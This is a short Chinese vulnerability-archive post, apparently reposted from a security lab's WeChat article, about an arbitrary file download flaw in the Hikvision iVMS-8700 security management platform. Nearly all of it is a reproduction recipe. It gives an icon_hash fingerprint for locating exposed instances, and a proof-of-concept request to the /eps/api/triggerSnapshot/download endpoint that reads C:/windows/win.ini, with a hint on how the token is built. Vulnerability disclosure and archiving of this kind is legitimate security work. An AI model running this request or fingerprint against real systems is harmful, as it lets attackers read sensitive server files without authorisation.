【漏洞归档】HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载漏洞

【漏洞归档】HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载漏洞
2023-6-23 00:3:7 Author: 利刃信安攻防实验室(查看原文) 阅读量:165 收藏

漏洞描述

HIKVISION iVMS-8700综合安防管理平台存在任意文件读取漏洞，攻击者通过发送特定的请求包可以读取服务器中的敏感文件获取服务器信息

#漏洞影响

HIKVISION iVMS-8700综合安防管理平台

#网络测绘

icon_hash="-911494769"

#漏洞复现

登录页面

验证POC， token 为 Url md5

/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1

文章来源: http://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247504765&idx=3&sn=f9e5c28ed817bc8501166a829a6051ff&chksm=fbfb63b0cc8ceaa66c1cac3497c3f73faafb3efa551340d7af4b7460278833c2bf4a0f44f2a5#rd
如有侵权请联系:admin#unsafe.sh